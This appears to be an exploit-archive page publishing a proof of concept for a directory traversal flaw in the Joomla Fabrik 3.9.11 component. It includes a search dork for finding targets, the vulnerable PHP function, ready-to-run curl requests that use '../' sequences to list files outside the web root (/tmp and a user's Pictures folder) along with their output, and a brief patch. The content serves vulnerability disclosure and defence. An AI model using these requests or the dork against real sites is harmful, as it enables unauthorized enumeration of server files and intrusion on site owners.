Joomla Fabrik 3.9.11 Directory Traversal

Joomla Fabrik 3.9.11 Directory Traversal: Posted Mar 30, 2020; Authored by qw3rTyTy; Joomla Fabrik component version 3.9.11 suffers from a directory traversal vulnerability.; tags | exploit, file inclusion; SHA-256 | 6bad29182a6bd3575ab9ca57bc52555b04aabb4cfdc488f7b87d996ef4ae786b; Download | Favorite | View

Joomla Fabrik 3.9.11 Directory Traversal

# Exploit Title: Joomla! com_fabrik 3.9.11 - Directory Traversal
#Google Dork: inurl:"index.php?option=com_fabrik"
#Date: 2020-03-30
#Exploit Author: qw3rTyTy
#Vendor Homepage: https://fabrikar.com/
#Software Link: https://fabrikar.com/downloads
#Version: 3.9
#Tested on: Debian/Nginx/Joomla! 3.9.11
##################################################################
#Vulnerability details
##################################################################
File: fabrik_element/image/image.php
Func: onAjax_files

   394          public function onAjax_files()
   395          {
   396                  $this->loadMeForAjax();
   397                  $folder = $this->app->input->get('folder', '', 'string');    //!!!Possible to directory-traversal.
   398
   399                  if (!strstr($folder, JPATH_SITE))
   400                  {
   401                          $folder = JPATH_SITE . '/' . $folder;
   402                  }
   403
   404                  $pathA = JPath::clean($folder);
   405                  $folder = array();
   406                  $files = array();
   407                  $images = array();
   408                  FabrikWorker::readImages($pathA, "/", $folders, $images, $this->ignoreFolders);
   409
   410                  if (!array_key_exists('/', $images))
   411                  {
   412                          $images['/'] = array();
   413                  }
   414
   415                  echo json_encode($images['/']);
   416          }
##################################################################
#PoC
##################################################################
$> curl -X GET -i "http://127.0.0.1/joomla/index.php?option=com_fabrik&task=plugin.pluginAjax&plugin=image&g=element&method=onAjax_files&folder=../../../../../../../../../../../../../../../tmp/"

...snip...
[{"value":"eila.jpg","text":"eila.jpg","disable":false},{"value":"eilanya.jpg","text":"eilanya.jpg","disable":false},{"value":"topsecret.png","text":"topsecret.png","disable":false}]
...snip...

$> curl -X GET -i "http://127.0.0.1/joomla/index.php?option=com_fabrik&task=plugin.pluginAjax&plugin=image&g=element&method=onAjax_files&folder=../../../../../../../../../../../../../../../home/user123/Pictures/"

...snip...
[{"value":"Revision2017_Banner.jpg","text":"Revision2017_Banner.jpg","disable":false},{"value":"Screenshot from 2019-02-23 22-43-54.png","text":"Screenshot from 2019-02-23 22-43-54.png","disable":false},{"value":"Screenshot from 2019-03-09 14-59-22.png","text":"Screenshot from 2019-03-09 14-59-22.png","disable":false},{"value":"Screenshot from 2019-03-09 14-59-25.png","text":"Screenshot from 2019-03-09 14-59-25.png","disable":false},{"value":"Screenshot from 2019-03-16 23-17-05.png","text":"Screenshot from 2019-03-16 23-17-05.png","disable":false},{"value":"Screenshot from 2019-03-18 07-30-41.png","text":"Screenshot from 2019-03-18 07-30-41.png","disable":false},{"value":"Screenshot from 2019-03-18 08-23-45.png","text":"Screenshot from 2019-03-18 08-23-45.png","disable":false},{"value":"Screenshot from 2019-04-08 00-09-36.png","text":"Screenshot from 2019-04-08 00-09-36.png","disable":false},{"value":"Screenshot from 2019-04-08 10-34-23.png","text":"Screenshot from 2019-04-08 10-34-23.png","disable":false},{"value":"Screenshot from 2019-04-13 08-23-48.png","text":"Screenshot from 2019-04-13 08-23-48.png","disable":false},{"value":"Screenshot from 2019-05-24 23-14-05.png","text":"Screenshot from 2019-05-24 23-14-05.png","disable":false},{"value":"b.jpg","text":"b.jpg","disable":false},{"value":"by_gh0uli.tumblr.com-8755.png.jpeg","text":"by_gh0uli.tumblr.com-8755.png.jpeg","disable":false},{"value":"max_payne_06.jpg","text":"max_payne_06.jpg","disable":false},{"value":"xxx.jpg","text":"xxx.jpg","disable":false}]
...snip...
##################################################################
#Q&D Patch (DO NOT USE :3)
##################################################################
--- ./image.php ---
+++ image_patched.php   ---
@@ -394,7 +394,7 @@
        public function onAjax_files()
        {
                $this->loadMeForAjax();
-               $folder = $this->app->input->get('folder', '', 'string');
+               $folder = $this->app->input->get('folder', '', 'cmd');
 
                if (!strstr($folder, JPATH_SITE))
                {

Top Authors In Last 30 Days

Red Hat 210 files
Ubuntu 64 files
Debian 27 files
LiquidWorm 11 files
Valentin Lobstein 11 files
nu11secur1ty 8 files
Apple 6 files
Google Security Research 5 files
Ersin Erenler 4 files
E1.Coders 4 files

File Archives

Systems

AIX (429)
Apple (2,078)
BSD (376)
CentOS (58)
Cisco (1,927)
Debian (7,014)
Fedora (1,693)
FreeBSD (1,246)
Gentoo (4,467)
HPUX (880)
iOS (373)
iPhone (108)
IRIX (220)
Juniper (69)
Linux (49,227)
Mac OS X (691)
Mandriva (3,105)
NetBSD (256)
OpenBSD (488)
RedHat (15,501)
Slackware (941)
Solaris (1,611)
SUSE (1,444)
Ubuntu (9,439)
UNIX (9,391)
UnixWare (187)
Windows (6,649)
Other

Joomla Fabrik 3.9.11 Directory Traversal

Joomla Fabrik 3.9.11 Directory Traversal

File Archive:

April 2024

Top Authors In Last 30 Days

File Tags

File Archives

Systems

Joomla Fabrik 3.9.11 Directory Traversal

Share This

Joomla Fabrik 3.9.11 Directory Traversal

File Archive:

April 2024

Top Authors In Last 30 Days

File Tags

File Archives

Systems